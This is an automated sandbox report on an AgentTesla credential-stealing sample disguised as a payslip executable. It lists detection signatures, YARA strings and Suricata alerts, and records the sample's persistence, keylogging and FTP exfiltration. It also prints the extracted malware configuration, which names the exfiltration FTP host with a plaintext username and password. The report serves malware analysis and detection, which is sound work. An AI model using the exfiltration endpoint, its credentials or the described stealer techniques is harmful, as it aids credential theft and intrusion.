Windows Analysis Report
Payslip_October_2024.exe

Overview

General Information

Sample name: Payslip_October_2024.exe
Analysis ID: 1548796
MD5: a0dadb7997e2b13144275b1c164f1c84
SHA1: 6f63137c9a20c05c04b53eaea60eae9355022a97
SHA256: 7602098a6b2a95ca014488ce7c67b273a6189d7cc4daa09fb639c32fc21afa99
Tags: AgentTesla, exe, user-threatcat_ch

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Payslip_October_2024.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\Payslip_October_2024.exe" MD5: A0DADB7997E2B13144275B1C164F1C84)
    • Payslip_October_2024.exe (PID: 7692 cmdline: "C:\Users\user\Desktop\Payslip_October_2024.exe" MD5: A0DADB7997E2B13144275B1C164F1C84)
  • sgxIb.exe (PID: 7952 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: A0DADB7997E2B13144275B1C164F1C84)
    • sgxIb.exe (PID: 8000 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: A0DADB7997E2B13144275B1C164F1C84)
    • sgxIb.exe (PID: 8008 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: A0DADB7997E2B13144275B1C164F1C84)
  • sgxIb.exe (PID: 7324 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: A0DADB7997E2B13144275B1C164F1C84)
    • sgxIb.exe (PID: 6128 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: A0DADB7997E2B13144275B1C164F1C84)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
00000005.00000002.1889661399.0000000002B91000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000005.00000002.1889661399.0000000002B91000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000005.00000002.1889661399.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000005.00000002.1886245023.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000005.00000002.1886245023.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
5.2.sgxIb.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
5.2.sgxIb.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
5.2.sgxIb.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | (strings listed below)
  • 0x34f7c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x34fee:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x35078:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x3510a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x35174:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x351e6:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x3527c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3530c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.sgxIb.exe.400000.0.unpack | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen | (strings listed below)
  • 0x32170:$s2: GetPrivateProfileString
  • 0x317fa:$s3: get_OSFullName
  • 0x32f6b:$s5: remove_Key
  • 0x33157:$s5: remove_Key
  • 0x34075:$s6: FtpWebRequest
  • 0x34f5e:$s7: logins
  • 0x354d0:$s7: logins
  • 0x38227:$s7: logins
  • 0x38293:$s7: logins
  • 0x39d12:$s7: logins
  • 0x38e2d:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.Payslip_October_2024.exe.49c6e28.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

                    System Summary

Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Payslip_October_2024.exe, ProcessId: 7692, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sgxIb
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-04T21:25:12.909275+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.4 | 49742 | TCP
2024-11-04T21:25:52.030022+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.4 | 49755 | TCP
2024-11-04T21:25:13.322096+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 110.4.45.197 | 21 | TCP
2024-11-04T21:25:22.350303+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.4 | 49751 | 110.4.45.197 | 21 | TCP
2024-11-04T21:25:14.233376+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 110.4.45.197 | 52210 | TCP
2024-11-04T21:25:14.238674+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 110.4.45.197 | 52210 | TCP
2024-11-04T21:25:23.295388+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49752 | 110.4.45.197 | 54816 | TCP
2024-11-04T21:25:23.301069+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49752 | 110.4.45.197 | 54816 | TCP

                    AV Detection

Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, ReversingLabs: Detection: 31%
Source: Payslip_October_2024.exe, ReversingLabs: Detection: 31%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Joe Sandbox ML: detected
Source: Payslip_October_2024.exe, Joe Sandbox ML: detected
Source: Payslip_October_2024.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: Payslip_October_2024.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Payslip_October_2024.exe, Code function: 4x nop then jmp 0E584654h (0_2_0E584845)

                    Networking

Source: Network traffic, Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49746 -> 110.4.45.197:52210
Source: Network traffic, Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49741 -> 110.4.45.197:21
Source: Network traffic, Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49752 -> 110.4.45.197:54816
Source: Network traffic, Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49751 -> 110.4.45.197:21
Source: global traffic, TCP traffic: 110.4.45.197 ports 49859,49239,65028,64457,59440,56373,56495,57287,63989,50371,60511,52210,52997,54816,60390,62468,59156,1,57997,51271,2,59616,58004,54487,60363,59816,21,61072,63370
Source: Yara match, File source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, type: UNPACKEDPE
Source: global traffic, TCP traffic: 192.168.2.4:49738 -> 110.4.45.197:49239
Source: Joe Sandbox View, IP Address: 104.26.12.205
Source: Joe Sandbox View, IP Address: 110.4.45.197
Source: Joe Sandbox View, ASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, DNS query: name: api.ipify.org
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49742
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49755
Source: unknown, FTP traffic detected: 110.4.45.197:21 -> 192.168.2.4:49735
  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  220-You are user number 6 of 50 allowed.
  220-Local time is now 04:24. Server port: 21.
  220-This is a private system - No anonymous login
  220-IPv6 connections are also welcome on this server.
  220 You will be disconnected after 15 minutes of inactivity.
Source: global traffic, HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
  Host: api.ipify.org
  Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: api.ipify.org
Source: global traffic, DNS traffic detected: DNS query: ftp.haliza.com.my
Source: unknown, Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown, Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49750 -> 443

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, SKTzxzsJw.cs, .Net Code: _71ZRqC1D
Source: C:\Users\user\Desktop\Payslip_October_2024.exe, Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Payslip_October_2024.exe
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
Source: C:\Users\user\Desktop\Payslip_October_2024.exe, Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Window created: window name: CLIPBRDWNDCLASS

                    System Summary

Source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 0.2.Payslip_October_2024.exe.49c6e28.1.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.Payslip_October_2024.exe.49c6e28.1.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload, Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_05A19A493_2_05A19A49
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_05A19A583_2_05A19A58
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_070169D03_2_070169D0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_070127C03_2_070127C0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_070127D03_2_070127D0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_07010C603_2_07010C60
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_07010C703_2_07010C70
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_070114E03_2_070114E0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_070108383_2_07010838
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_070110A83_2_070110A8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_02984A685_2_02984A68
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_0298E8A05_2_0298E8A0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_02983E505_2_02983E50
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_0298AC805_2_0298AC80
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_029841985_2_02984198
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_068418005_2_06841800
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_06857E985_2_06857E98
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_068556B05_2_068556B0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_068567085_2_06856708
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_068535805_2_06853580
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_068500405_2_06850040
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_06855E105_2_06855E10
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_068577B85_2_068577B8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_0685E4D05_2_0685E4D0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_068500075_2_06850007
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_06E968D87_2_06E968D8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_06E927C07_2_06E927C0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_06E927D07_2_06E927D0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_06E914E07_2_06E914E0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_06E90C607_2_06E90C60
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_06E90C707_2_06E90C70
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_06E910A87_2_06E910A8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_06E908387_2_06E90838
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_00FEC5148_2_00FEC514
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_00FEE8A08_2_00FEE8A0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_00FE4A688_2_00FE4A68
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_00FE3E508_2_00FE3E50
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_00FE41988_2_00FE4198
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_06857E988_2_06857E98
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_068556B08_2_068556B0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_068567088_2_06856708
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_068535808_2_06853580
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_068500408_2_06850040
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_068577B88_2_068577B8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_0685E4D08_2_0685E4D0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_06855DFF8_2_06855DFF
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_0685001D8_2_0685001D
                    Source: Payslip_October_2024.exe, 00000000.00000002.1678292611.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs Payslip_October_2024.exe
                    Source: Payslip_October_2024.exe, 00000000.00000002.1681687434.000000000B2D0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs Payslip_October_2024.exe
                    Source: Payslip_October_2024.exe, 00000000.00000002.1677108158.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs Payslip_October_2024.exe
                    Source: Payslip_October_2024.exe, 00000000.00000002.1678620012.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs Payslip_October_2024.exe
                    Source: Payslip_October_2024.exe, 00000000.00000002.1678620012.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs Payslip_October_2024.exe
                    Source: Payslip_October_2024.exe, 00000000.00000000.1648226168.0000000000AF6000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenamesPtN.exe. vs Payslip_October_2024.exe
                    Source: Payslip_October_2024.exe, 00000002.00000002.4120007288.00000000007F9000.00000004.00000010.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Payslip_October_2024.exe
                    Source: Payslip_October_2024.exe, Binary or memory string: OriginalFilenamesPtN.exe. vs Payslip_October_2024.exe
                    Source: Payslip_October_2024.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: Payslip_October_2024.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: sgxIb.exe.2.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, 4JJG6X.cs, Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, 8C78isHTVco.cs, Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, CqSP68Ir.cs, Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, CqSP68Ir.cs, Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, f0FZ3tm1t5LeGCMWQS.cs, Security API names: _0020.SetAccessControl
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, f0FZ3tm1t5LeGCMWQS.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, f0FZ3tm1t5LeGCMWQS.cs, Security API names: _0020.AddAccessRule
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, JtgxviEHqAVBfiVUqo.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, JtgxviEHqAVBfiVUqo.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, f0FZ3tm1t5LeGCMWQS.cs, Security API names: _0020.SetAccessControl
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, f0FZ3tm1t5LeGCMWQS.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, f0FZ3tm1t5LeGCMWQS.cs, Security API names: _0020.AddAccessRule
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, JtgxviEHqAVBfiVUqo.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, f0FZ3tm1t5LeGCMWQS.cs, Security API names: _0020.SetAccessControl
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, f0FZ3tm1t5LeGCMWQS.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, f0FZ3tm1t5LeGCMWQS.cs, Security API names: _0020.AddAccessRule
                    Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@11/4@2/2
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe, File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payslip_October_2024.exe.log
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Mutant created: NULL
                    Source: Payslip_October_2024.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe, File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: Payslip_October_2024.exe, ReversingLabs: Detection: 31%
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe, File read: C:\Users\user\Desktop\Payslip_October_2024.exe
                    Source: unknown, Process created: C:\Users\user\Desktop\Payslip_October_2024.exe "C:\Users\user\Desktop\Payslip_October_2024.exe"
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe, Process created: C:\Users\user\Desktop\Payslip_October_2024.exe "C:\Users\user\Desktop\Payslip_October_2024.exe"
                    Source: unknown, Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
